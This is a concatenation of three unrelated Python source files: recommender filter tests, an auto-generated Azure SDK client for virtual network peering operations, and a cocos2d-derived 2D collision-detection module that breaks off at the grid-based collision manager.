custom_settings=custom_settings,
context_filter_string='{{"language": "german","date": {{"$gt": "{0}", "$lt": "{1}"}}}}'.format(
one_hour_before.isoformat(), one_hour_after.isoformat()),
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.eq_(len(filtered_products), 2)
session = tests.init_session(
user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{{"language": "german","date": {{"$lt": "{0}", "$gt": "{1}"}}}}'.format(
one_hour_before.isoformat(), one_hour_after.isoformat()),
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.eq_(len(filtered_products), 0)
def _check_empty_filter_returning_all_products(self, custom_settings, intended_count, target_user):
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string="{}",
algorithm=self.algorithm)
recommender = session.get_recommender()
filter_count = len(recommender.recommend(1000))
nose.tools.ok_(intended_count > 0, 'The filter test requires products to exist')
nose.tools.eq_(intended_count, filter_count,
'An empty filter should bring all products total({0}), returned({1})'.format(
intended_count, filter_count))
def _check_result_is_none_for_bad_filter(self, strategy):
target_user = "u_tec_1"
custom_settings = {
'filter_strategy': strategy
}
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "xxxx"}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(1000)
nose.tools.eq_(len(filtered_products), 0)
def _check_language_filter(self, strategy):
product_count = self.db_proxy.get_product_model_count()
target_user = "u_tec_1"
custom_settings = {
'filter_strategy': strategy
}
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
algorithm=self.algorithm)
recommender = session.get_recommender()
product_ids = [product_id for _, product_id in recommender.recommend(1000)]
products = {product_id for product_id, product in
self.db_proxy.fetch_product_models(product_ids=product_ids,
max_date=session.get_present_date()).items() if
product.get_attribute("language") == "portuguese"}
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "portuguese"}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(1000)
filtered_product_ids = [product_id for _, product_id in filtered_products]
nose.tools.ok_(product_count > 0, 'The filter test requires products to exist')
nose.tools.ok_(
products.issubset(filtered_product_ids),
'A filtered request should only bring the products that match the filter requirements,'
' total({0}), returned({1})'.format(len(product_ids), len(filtered_product_ids)))
def _check_number_of_filtered_products(self, intended_count, strategy):
custom_settings = {
'filter_strategy': strategy
}
product_count = self.db_proxy.get_product_model_count()
target_user = "u_filter_1"
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string='{"language": "german"}',
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(product_count > 0, 'The filter test requires products to exist')
nose.tools.eq_(len(filtered_products), intended_count)
def _check_pre_and_pos_filters_match(self, filter_string, n_recommendations):
target_user = "u_tec_1"
custom_settings = {
'filter_strategy': ctx.BEFORE_SCORING,
'previous_consumption_factor': 0
}
session = tests.init_session(custom_settings,
context_filter_string=filter_string,
user_id=target_user,
algorithm=self.algorithm)
pre_filtered_candidates_count = len(session.filtered_products)
# sanity check
nose.tools.ok_(pre_filtered_candidates_count > 0, "Weak test. No pre-filtered candidate products.")
recommender = session.get_recommender()
recommendation_with_pre_filter = recommender.recommend(n_recommendations)
ranked_products_pre_filter = [r[1] for r in recommendation_with_pre_filter]
custom_settings = {
'filter_strategy': ctx.AFTER_SCORING,
'previous_consumption_factor': 0
}
session = tests.init_session(custom_settings,
context_filter_string=filter_string,
user_id=target_user,
algorithm=self.algorithm)
recommender = session.get_recommender()
recommendation_with_pos_filter = recommender.recommend(n_recommendations)
ranked_products_pos_filter = [r[1] for r in recommendation_with_pos_filter]
nose.tools.eq_(ranked_products_pre_filter[:pre_filtered_candidates_count],
ranked_products_pos_filter[:pre_filtered_candidates_count],
"Recommendation lists for pre- and pos-filters do not match")
def _check_basic_and_filters(self, intended_count, strategy):
custom_settings = {
'filter_strategy': strategy
}
product_count = self.db_proxy.get_product_model_count()
target_user = "u_filter_1"
date = self.session_context.get_present_date()
date_str = date.isoformat()
context_filter_string = '{"$and": [{"language": "german"}, {"date": "' + date_str + '"}]}'
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string=context_filter_string,
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(product_count > 0, 'The filter test requires products to exist')
nose.tools.eq_(len(filtered_products), intended_count)
def _check_basic_or_filters(self, intended_count, strategy):
custom_settings = {
'filter_strategy': strategy
}
product_count = self.db_proxy.get_product_model_count()
target_user = "u_filter_1"
date = self.session_context.get_present_date()
date_str = date.isoformat()
context_filter_string = '{"$or": [{"language": "german"}, {"date": "' + date_str + '"}]}'
session = tests.init_session(user_id=target_user,
custom_settings=custom_settings,
context_filter_string=context_filter_string,
algorithm=self.algorithm)
recommender = session.get_recommender()
filtered_products = recommender.recommend(5)
nose.tools.ok_(product_count > 0, 'The filter test requires products to exist')
nose.tools.eq_(len(filtered_products), intended_count)
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class VirtualNetworkPeeringsOperations(object):
"""VirtualNetworkPeeringsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API version. Constant value: "2017-11-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-11-01"
self.config = config
def _delete_initial(
self, resource_group_name, virtual_network_name, virtual_network_peering_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'virtualNetworkPeeringName': self._serialize.url("virtual_network_peering_name", virtual_network_peering_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, virtual_network_name, virtual_network_peering_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes the specified virtual network peering.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param virtual_network_peering_name: The name of the virtual network
peering.
:type virtual_network_peering_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
virtual_network_peering_name=virtual_network_peering_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings/{virtualNetworkPeeringName}'}
def get(
self, resource_group_name, virtual_network_name, virtual_network_peering_name, custom_headers=None, raw=False, **operation_config):
"""Gets the specified virtual network peering.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param virtual_network_peering_name: The name of the virtual network
peering.
:type virtual_network_peering_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: VirtualNetworkPeering or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.network.v2017_11_01.models.VirtualNetworkPeering
or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'virtualNetworkPeeringName': self._serialize.url("virtual_network_peering_name", virtual_network_peering_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VirtualNetworkPeering', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings/{virtualNetworkPeeringName}'}
def _create_or_update_initial(
self, resource_group_name, virtual_network_name, virtual_network_peering_name, virtual_network_peering_parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'virtualNetworkPeeringName': self._serialize.url("virtual_network_peering_name", virtual_network_peering_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(virtual_network_peering_parameters, 'VirtualNetworkPeering')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VirtualNetworkPeering', response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualNetworkPeering', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, virtual_network_name, virtual_network_peering_name, virtual_network_peering_parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates or updates a peering in the specified virtual network.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param virtual_network_peering_name: The name of the peering.
:type virtual_network_peering_name: str
:param virtual_network_peering_parameters: Parameters supplied to the
create or update virtual network peering operation.
:type virtual_network_peering_parameters:
~azure.mgmt.network.v2017_11_01.models.VirtualNetworkPeering
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns VirtualNetworkPeering
or ClientRawResponse<VirtualNetworkPeering> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_11_01.models.VirtualNetworkPeering]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_11_01.models.VirtualNetworkPeering]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
virtual_network_peering_name=virtual_network_peering_name,
virtual_network_peering_parameters=virtual_network_peering_parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('VirtualNetworkPeering', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings/{virtualNetworkPeeringName}'}
def list(
self, resource_group_name, virtual_network_name, custom_headers=None, raw=False, **operation_config):
"""Gets all virtual network peerings in a virtual network.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of VirtualNetworkPeering
:rtype:
~azure.mgmt.network.v2017_11_01.models.VirtualNetworkPeeringPaged[~azure.mgmt.network.v2017_11_01.models.VirtualNetworkPeering]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.VirtualNetworkPeeringPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.VirtualNetworkPeeringPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/virtualNetworkPeerings'}
| |
# coding: utf-8
# Copyright (c) 2013 Jorge Javier Araya Navarro <jorgean@lavabit.org>
#
# This file is free software: you may copy, redistribute and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# This file incorporates work covered by the following copyright and
# permission notice:
#
# cocos2d
# Copyright (c) 2008-2012 Daniel Moisset, Ricardo Quesada, Rayentray Tappa,
# Lucio Torre
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of cocos2d nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
__docformat__ = 'restructuredtext'
import operator as op
import math
import summa.euclid as eu
###### interfaces, abstract base clases ######################################
# cshape reference interfase
class Cshape(object):
"""
Represents an abstract geometric shape in the 2D space, and can
answer questions about proximity or intersection with other shapes.
Implementations are free to restrict the type of geometrical shapes
that will accept, by example circles or axis aligned rectangles.
"""
def overlaps(self, other):
"""
Returns True if overlapping other, False otherwise
:rtype: bool
"""
pass
def distance(self, other):
"""
Returns a float, distance from itself to other;
Not necessarily euclidean distance.
It is distances between boundaries.
:rtype: float
"""
pass
def near_than(self, other, near_distance):
"""
Returns a boolean, True if distance(self, other)<=near_distance
:rtype: bool
"""
pass
def touches_point(self, x, y):
"""
Returns True if the point (x,y) overlaps the shape, False otherwise
:rtype: bool
"""
pass
def fits_in_box(self, packed_box):
"""
Returns a boolean, True if the shape fully fits into the axis aligned
rectangle defined by packed_box, False otherwise.
:Parameters:
`packed_box` : 4-tuple floats
An axis aligned rectangle expressed as (minx, maxx, miny, maxy)
:rtype: bool
"""
pass
def minmax(self):
"""
Returns the smallest axis aligned rectangle that contains all shape points.
The rectangle is expressed as a 4-tuple of floats (minx, maxx, miny, maxy)
Such a rectangle is also know as the Axis Aligned Bounding Box for shape;
AABB for short.
:rtype: 4-tuple of floats
"""
pass
def copy(self):
"""
Returns a copy of itself
:rtype: Cshape
"""
pass
# collision manager interfase
class CollisionManager(object):
"""
Answers questions about proximity or collision with known objects.
After instantiation or after calling its 'clear' method the instance
don't knows any object.
An object is made known to the CollisionManager instance by calling its
'add' method with the object instance.
Example questions are:
- which known objects collides with <this object> ?
- which known objects are near than 6.0 from <this object> ?
Note that explicit objects in the question (call) don't need to be known to
the collision manager answering the question.
If the explicit object indeed is known, then it is omitted in the answer as a
trivial case.
There can be multiple CollisionManager instances in the same scope, and
an object can be known to many collision managers at the same time.
Objects that can be known or can be presented to a Collision Manager in
a question must comply with:
- obj has a member called cshape
- obj.cshape supports the interface Cshape
Such an object can be called 'a collidable' in the documentation, and when
'obj' or 'other' is seen in the code you can assume it means collidable.
As a limitation imposed by the current Cshapes implementations, all the
collidables that interacts with a particular instance of CollisionManager
must share the same concrete Cshape subclass: by example, all
objects should have a CircleShape cshape, or all objects should have a
AARectShape cshape.
The known objects collective for each CollisionManager instance is
manipulated by calling the methods
- clean() \: forgets all objects and empties internal data structures
- add(obj) \: remember obj as a known object
- remove_tricky(obj) \: forgets obj
When objects are made known to a collision manager, internal data structures
are updated based on the obj.cshape value at the 'add' moment.
In particular, the obj.cshape indirectly tells where in the internal
structures certain info will be stored.
Later, the internal data structures are used to accelerate answers.
This means that modifying obj.cshape after an 'add' can produce a memory
leak in the next 'remove_tricky', and that in the same situation some
answers can be partially wrong.
What type of wrong ? It can sometimes miss a collision with a know
object that changed it cshape.
It is user code responsibility to drive the know objects update when
obj.cshape values changes.
Common use patterns that are safe and efficient:
When most of the known objects update cshape each frame
You do::
# updating collision info
collision_manager.clear() # fast, no leaks even if changed cshapes
for actor in moving_actors:
collision_manager.add(actor)
# game logic
# do what you need, but defer changes in cshape to next block
# by example
for actor in moving_actors:
actor.new_pos = actor.cshape.center + dt * vel
#other logic that potentially needs collision info;
#it will be accurate because you have not changed cshapes
...
# update cshapes for next frame
for actor in moving actors:
actor.cshape.center = actor.new_pos
Example actors for this case are player, enemies, soldiers.
All of the known objects don't change cshapes
- At level start you add all objects
- When an actor reaches end of life use 'remove_tricky' to make it not known, no problem because his cshape has not changed
Examples actors for this case are food, coins, trees, rocks.
"""
def add(self, obj):
"""
Makes obj a know entity
"""
pass
def remove_tricky(self, obj):
"""
*(obj should have the same .cshape value that when added)*
Makes collision manager forget about obj, thus no further query will
return obj.
obj is required to be a known object.
"""
def clear(self):
"""
Empties the known set
"""
pass
def they_collide(self, obj1, obj2):
"""
Returns a boolean, True if obj1 overlaps objs2
obj1, obj2 are not required to be known objects
"""
pass
def objs_colliding(self, obj):
"""
Returns a container with known objects that overlaps obj,
excluding obj itself
obj is not required to be a known object
"""
pass
def iter_colliding(self, obj):
"""
A lazy iterator over objects colliding with obj, allows to spare some
CPU when the loop procesing the colissions breaks before exausting
the collisions.
obj is not required to be a known object
Usage::
for other in collision_manager.iter_colliding(obj):
# process event 'obj touches other'
"""
pass
def any_near(self, obj, near_distance):
"""
Returns None if no know object (except itself) is near than
near_distance, else an arbitrary known object with distance
less than near_distance
obj is not required to be a known object
"""
pass
def objs_near(self, obj, near_distance):
"""
Returns a container with the objects known by collision manager that
are at distance to obj less or equal than near_distance, excluding
itself.
Notice that it includes the ones colliding with obj.
obj is not required to be a known object
"""
pass
def objs_near_wdistance(self, obj, near_distance):
"""
Returns a list with the (other, distance) pairs that with all the
known objects at distance less or equal than near_distance to obj,
except obj itself.
Notice that it includes the ones colliding with obj.
obj is not required to be a known object
If the game logic wants the list ordered by ascending distances, use
ranked_objs_near instead.
"""
pass
def ranked_objs_near(self, obj, near_distance):
"""
Same as objs_near_wdistance but the list is ordered in increasing distance
obj is not required to be a known object
"""
pass
def iter_all_collisions(self):
"""
Iterator that exposes all collisions between known objects.
At each step it will yield a pair (obj, other).
If (obj1, obj2) is seen when consuming the iterator, then (obj2, obj1)
will not be seen.
In other worlds, 'obj1 collides with obj2' means (obj1, obj2) or
(obj2, obj1) will appear in the iterator output but not both.
"""
def knows(self, obj):
"""Returns True if obj was added to the collision manager, false otherwise
Used for debug and testing.
"""
pass
def known_objs(self):
"""Reurns a set with all the objects known by the CollisionManager
Used for debug and testing.
"""
pass
def objs_touching_point(self, x, y):
"""Returns a container with known objects touching point (x, y)
Useful for mouse pick
"""
pass
def objs_into_box(self, minx, maxx, miny, maxy):
"""Returns a container with know objects that fully fits into the axis
aligned rectangle defined by params
Useful for elastic box selection
"""
pass
###### Cshape implementations #################################################
class CircleShape(object):
"""
Implements the Cshape interface that uses discs as geometric shape.
Distance is the euclidean distance.
Look at Cshape for other class and methods documentation.
"""
def __init__(self, center, r):
"""
:Parameters:
`center` : euclid.Vector2
rectangle center
`r` : float
disc radius
"""
self.center = center
self.r = r
def overlaps(self, other):
return abs(self.center - other.center) < self.r + other.r
def distance(self, other):
d = abs(self.center - other.center) - self.r - other.r
if d<0.0:
d = 0.0
return d
def near_than(self, other, near_distance):
return abs(self.center - other.center) <= self.r + other.r + near_distance
def touches_point(self, x, y):
return abs(self.center - (x,y)) <= self.r
def fits_in_box(self, packed_box):
r = self.r
return ( ((packed_box[0] + r) <= self.center[0] <= (packed_box[1] - r)) and
((packed_box[2] + r) <= self.center[1] <= (packed_box[3] - r)) )
def minmax(self):
r = self.r
return (self.center[0]-r, self.center[0]+r,
self.center[1]-r, self.center[1]+r)
def copy(self):
return CircleShape(eu.Vector2(*self.center), self.r)
class AARectShape(object):
"""
Implements the Cshape interface that uses rectangles with sides
paralell to the coordinate axis as geometric shape.
Distance is not the euclidean distance but the rectangular or max-min
distance, max( min(x0 - x1), min(y0 - y1) : (xi, yi) in recti )
Good if actors don't rotate.
Look at Cshape for other class and methods documentation.
"""
def __init__(self, center, half_width, half_height):
"""
:Parameters:
`center` : euclid.Vector2
rectangle center
`half_width` : float
half width of rectangle
`half_height` : float
half height of rectangle
"""
self.center = center
self.rx = half_width
self.ry = half_height
def overlaps(self, other):
return ( abs(self.center[0] - other.center[0]) < self.rx + other.rx and
abs(self.center[1] - other.center[1]) < self.ry + other.ry )
def distance(self, other):
d = max((abs(self.center[0] - other.center[0])-self.rx - other.rx,
abs(self.center[1] - other.center[1])-self.ry - other.ry ))
if d<0.0:
d = 0.0
return d
def near_than(self, other, near_distance):
return ( abs(self.center[0] - other.center[0]) - self.rx - other.rx < near_distance and
abs(self.center[1] - other.center[1]) - self.ry - other.ry < near_distance)
def touches_point(self, x, y):
return ( abs(self.center[0] - x) < self.rx and
abs(self.center[1] - y) < self.ry )
def fits_in_box(self, packed_box):
return ( (packed_box[0] + self.rx <= self.center[0] <= packed_box[1] - self.rx) and
(packed_box[2] + self.ry <= self.center[1] <= packed_box[3] - self.ry) )
def minmax(self):
return (self.center[0] - self.rx, self.center[0] + self.rx,
self.center[1] - self.ry, self.center[1] + self.ry)
def copy(self):
return AARectShape(eu.Vector2(*self.center), self.rx, self.ry)
###### CollisionManager implementations #######################################
class CollisionManagerBruteForce(object):
"""
Implements the CollisionManager interface with with the simpler code possible.
Intended for reference and debuging, it has very bad performance.
Look at CollisionManager for other class and methods documentation.
"""
def __init__(self):
self.objs = set()
def add(self, obj):
#? use weakref ? python 2.7 has weakset
self.objs.add(obj)
def remove_tricky(self, obj):
self.objs.remove(obj)
def clear(self):
self.objs.clear()
def they_collide(self, obj1, obj2):
return obj1.cshape.overlaps(obj2.cshape)
def objs_colliding(self, obj):
f_overlaps = obj.cshape.overlaps
return [other for other in self.objs if
(other is not obj) and f_overlaps(other.cshape)]
def iter_colliding(self, obj):
f_overlaps = obj.cshape.overlaps
for other in self.objs:
if other is not obj and f_overlaps(other.cshape):
yield other
def any_near(self, obj, near_distance):
f_near_than = obj.cshape.near_than
for other in self.objs:
if other is not obj and f_near_than(other.cshape,near_distance):
return other
return None
def objs_near(self, obj, near_distance):
f_near_than = obj.cshape.near_than
return [other for other in self.objs if
(other is not obj) and f_near_than(other.cshape,near_distance)]
def objs_near_wdistance(self, obj, near_distance):
f_distance = obj.cshape.distance
res = []
for other in self.objs:
if other is obj:
continue
d = f_distance(other.cshape)
if d<= near_distance:
res.append((other, d))
return res
## def objs_near_wdistance(self, obj, near_distance):
## # alternative version, needs python 2.5+
## f_distance = obj.cshape.distance
## def f(other):
## return other, f_distance(other.cshape)
## import itertools as it
## return [(other, d) for other,d in it.imap(f, self.objs) if
## (other is not obj) and
## (d <= near_distance)]
def ranked_objs_near(self, obj, near_distance):
tmp = objs_near_wdistance(obj, near_distance)
tmp.sort(key=op.itemgetter(1))
return tmp
def iter_all_collisions(self):
# O(n**2)
for i, obj in enumerate(self.objs):
f_overlaps = obj.cshape.overlaps
for j, other in enumerate(self.objs):
if j>=i:
break
if f_overlaps(other.cshape):
yield (obj, other)
def knows(self, obj):
return obj in self.objs
def known_objs(self):
return self.objs
def objs_touching_point(self, x, y):
touching = set()
for obj in self.objs:
if obj.cshape.touches_point(x, y):
touching.add(obj)
return touching
def objs_into_box(self, minx, maxx, miny, maxy):
into = set()
packed_box = minx, maxx, miny, maxy
for obj in self.objs:
if obj.cshape.fits_in_box(packed_box):
into.add(obj)
return into
class CollisionManagerGrid(object):
"""
Implements the CollisionManager interface based on the scheme
known as spatial hashing.
